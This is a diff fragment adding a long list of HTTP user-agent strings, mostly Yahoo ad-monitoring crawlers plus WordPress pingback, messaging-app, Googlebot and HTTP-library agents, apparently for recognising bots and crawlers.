    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600922380-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600925435-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600927955-0
    +WordPress/5.5.1; https://wawplus.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600955810-0
    +WordPress/5.5.1; https://askjavascriptquestions.com
    +WhatsApp/2.20.102 i
    +Snapchat/11.1.6.0 (iPhone11,8; iOS 14.0; gzip)
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.0.1180 (SpeedMode; Proxy; Android 5.1; IdeaTabA1000-G ) U2/1.0.0 Mobile
    +WordPress/5.5.1; https://www.re-aim.org; verifying pingback from 101.108.163.46
    +WordPress/5.2.7; https://buyfollowerfast.com/blog; verifying pingback from 5.62.19.53
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600907923-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600911596-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600914042-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600922523-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600928076-10
    +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1600950484-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600956038-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600959445-10
    +WhatsApp/2.20.201.5 A
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) adbeat.com/policy AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600908424-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600912403-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600915532-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600923387-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600921587-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600926026-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600928595-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600931133-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600940769-0
    +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1600950066-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600956549-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600961437-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600961439-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600976438-0
    +WhatsApp/2.20.201.4 A
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1600908484-60
    +WordPress/5.5; https://soft-parad.ru
    +libwww-perl/6.48
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600992759-0
    +WhatsApp/2.2039.9 N
    +WordPress/4.9.15; http://www.newthinktank.com; verifying pingback from 5.62.19.68
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600992943-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601057944-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601057946-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601064810-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601064812-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1600993494-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600999632-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600999639-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1600999973-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601028780-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601033947-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601033948-0
    +WhatsApp/2.20.201.6 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601040981-0
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.133 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601070322-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601070322-60
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601070321-0
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.0.1180 (SpeedMode; Proxy; Android 5.1; SM-J701F ) U2/1.0.0 Mobile
    +WordPress/4.9.15; http://www.ddqiiy.co
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601070322-10
    +AppEngine-Google; (+http://code.google.com/appengine; appid: e~houseinfoodin)
    +NetSurf/3.10 (Haiku)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1601081033-0
    +WordPress/5.4.2; https://bankkurs.ru
    +WordPress/3.9.12; http://www.tahmin1x2.com; verifying pingback from 162.158.159.30
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1601081150-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1601081874-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601094534-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601099143-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601126558-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601126555-0
    +WhatsApp/2.20.201.7 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601138950-0
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.134 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 PTST/200925.160943
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 5.0.1; IdeaTabA1000-G ) U2/1.0.0 Mobile
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/200925.160943
    +WordPress/5.5.1; http://staging.mergerscorp.com/de/
    +Mozilla/5.0 SeznamEmailProxy/0.0.34
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1601113599-60
    +Snapchat/10.88.0.60 (iPhone10,6; iOS 13.5.1; gzip)
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.1.1138 (SpeedMode; Proxy; Android 6.0; HTC_Desire_601_dual_sim ) U2/1.0.0 Mobile
    +WordPress/5.5; https://7ik.ru
    +AppEngine-Google; (+http://code.google.com/appengine; appid: e~baseinfovtlr)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: g~stockinfovicto)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: h~houseinfokokor)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: o~siteinfozavi)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: h~bugsinfovodo)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: o~baseinfovodo)
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 5.0.2; vivo_Y51L ) U2/1.0.0 Mobile
    +Snapchat/11.1.6.81 (SM-G973U; Android 10#G973USQU4ETH7#29; gzip) V/MUSHROOM
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1601165701-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601203477-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601203478-10
    +WordPress/5.2.7; https://buyfollowerslike.com/blog; verifying pingback from 5.62.19.70
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1601166341-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601188424-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601206782-0
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.135 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601180882-0
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/85.0.4183.122 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601180882-60
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601180881-0
    +WordPress/5.5.1; https://raidersnews.weddingdecorations.club
    +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1601212615-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601180882-10
    +AppEngine-Google; (+http://code.google.com/appengine; appid: o~zavirihnafseo)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: h~bizinfovicto)
    +Apache Httpclient
    +GuzzleHttp/6.5.5 curl/7.61.1 PHP/7.3.19
    +Faraday v0.17.3
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601295531-0
    +GuzzleHttp/6.2.1 curl/7.29.0 PHP/5.6.31
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 4.4.2; SM-G600FY ) U2/1.0.0 Mobile
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.3.0.1130 (SpeedMode; Proxy; Android 5.0.1; SM-N910H ) U2/1.0.0 Mobile
    +WordPress/5.5.1; http://intra.mediatechnic.net; verifying pingback from 5.62.19.70
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601275898-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1601253298-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601265352-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601294788-0
    +Mozilla/5.0 (Windows NT 6.3; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    +WordPress/5.4.2; https://teknoseyir.com
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.136 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 PTST/200926.140952
    +WordPress/5.5.1; http://staging.mergerscorp.com/zh-hans/
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.demand/1601274937-0
    +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/85.0.4183.122Safari/537.36
    +AppEngine-Google; (+http://code.google.com/appengine; appid: e~storeinfokrisf)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: o~bizinfokrisf)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: g~lakeinfovtlr)
    +WordPress/5.4.2; http://appdata.space
    +AppEngine-Google; (+http://code.google.com/appengine; appid: h~siteinfotimur)
    +AppEngine-Google; (+http://code.google.com/appengine; appid: o~stockinfozavi)
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4276.0 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +WordPress/5.5; https://root-nation.com
    +WordPress/5.3.4; https://www.surprice.ca
    +Scrapy/1.7.3
    +WhatsApp/2.20.23
    +GuzzleHttp/6.5.0 curl/7.61.1 PHP/7.3.11
    +Sistrix
    +WordPress/5.2.5; https://ukdealpal.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1601340839-0
    +WordPress/5.5.1; http://116.62.66.82
    +WordPress/5.5.1; https://www.ispazio.net
    +WordPress/5.3.2; http://intreeotech.altervista.org
    +WordPress/5.5.1; https://www.destaca.es
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +WordPress/5.4.2; http://www.cognitive.co.in; verifying pingback from 5.62.19.70
    +WordPress/5.3.4; http://athyphoto.ie/wp; verifying pingback from 5.135.108.174
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1601341218-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601403671-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1601341913-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601352699-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1601359677-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601359666-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601364802-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601364796-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601371283-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601371284-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601380815-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601380927-0
    +WhatsApp/2.20.201.8 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601391612-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601391613-0
    +WhatsApp/2.20.200.18 A
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 PTST/200928.230908
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/85.0.4183.136 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601365227-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601365227-60
    +WordPress/5.3.4; https://polytech-soft.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601365226-0
    +python-requests/2.16.0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601365228-10
    +AppEngine-Google; (+http://code.google.com/appengine; appid: o~lakeinfovodom)
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.1.5.583 (SpeedMode; Proxy; Android 5.1.1; VS880PP ) U2/1.0.0 Mobile
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/87.0.4256.0 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601417508-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601417509-0
    +WordPress/5.3; http://b179h696.marlena.xyz
    +WordPress/5.3; http://c272h683.arturek.xyz
    +WordPress/5.3.2; https://www.bons-plans-malins.com
    +WordPress/4.8.12; https://chuyouding.com
    +WordPress/4.8.12; https://lvriben.com
    +WordPress/5.3.2; https://freshcoupon.org
    +WordPress/4.9.13; https://daydayplay.hk
    +WordPress/5.3.2; https://sallyffg.com
    +WordPress/5.2.4; https://www.sgdtips.com
    +WordPress/5.3.2; https://www.hoteldig.com
    +WordPress/5.2.5; https://marleyspoonfoodguide.review/de
    +WordPress/5.3.4; https://freshcoupon.org
    +WordPress/4.8.14; https://lvriben.com
    +WordPress/4.7.18; https://turenhui.com
    +WordPress/5.4.2; https://discountcodez.com
    +GuzzleHttp/6.5.5 curl/7.58.0 PHP/7.4.3
    +WordPress.com; http://blog.mallid.com
    +WordPress/5.4.2; https://karla-nomade.com
    +MBCrawler/1.0 (https://monitorbacklinks.com/robot)
    +WordPress/4.9.15; https://xiao-ck.com
    +GuzzleHttp/6.5.5 curl/7.68.0 PHP/7.4.9
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1601428935-0
    +MetaInspector/4.7.2 (+https://github.com/jaimeiniesta/metainspector)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1601488967-0
    +WhatsApp/2.20.200.20 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1601491785-0
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.138 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +WordPress/3.5.1; http://blogs.creighton.edu/tma08925
    +WordPress/5.4.2; https://realestatebyremy.com; verifying pingback from 162.158.165.148
    +GuzzleHttp/6.5.5 curl/7.29.0 PHP/7.4.8
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1601429113-10
    +WhatsApp/2.20.201.9 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1601489100-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1601491903-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601508695-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601428477-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1601429639-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1601429934-0
